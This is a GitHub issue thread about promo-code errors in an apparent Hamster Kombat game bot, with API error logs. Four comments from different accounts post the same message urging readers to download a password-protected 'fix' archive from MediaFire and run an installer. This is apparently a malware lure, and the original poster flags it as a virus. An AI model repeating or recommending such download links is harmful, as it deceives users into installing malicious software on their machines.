### ISSUE TITLE
[ERROR] Unknown error while Apply Promo

### ISSUE THREAD

**Issue by DineshValor** [shamhi/HamsterKombatBot#2265]
```
2024-08-27 04:26:29 | ERROR    | 37 - Unknown error while Apply Promo: 400, message='Bad Request', url='https://api.hamsterkombatgame.io/clicker/apply-promo' | Response text: {"error_code":"MaxKeysReceived","error_message":"Maximum keys received today"}...
2024-08-27 04:26:32 | INFO     | 356 - Hamster Valor | Promo code POLY-YPL-PVKT-XRZ2-7K1 was wrong in Polysphere game | Trying again...
```

![Screenshot_20240827-145511](https://github.com/user-attachments/assets/4a5c4739-27ce-4fea-87c2-c80d34856caa)

```
ERROR    | 37 - Unknown error while Apply Promo: 524, message='', url='https://api.hamsterkombatgame.io/clicker/apply-promo' | Response text: \<!DOCTYPE html\>
\<!--[if lt IE 7]\> \<html class="no-js ie6 oldie" lang="en-US"\> <![endif]--\>
\<!--[if IE 7]\>    \<html class="no-js ie7 oldie" lang="en-US"\> <![endif]--\>
\<!--[if IE 8]\>    \<html class="no-js ie8 oldie" lang="en-US"\> \<![endif]...
```

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DineshValor** [comment]
> Download https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file password: changeme In the installer menu, select "gcc."

### ⚠️ WARNING
virus speeding..  @shamhi

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
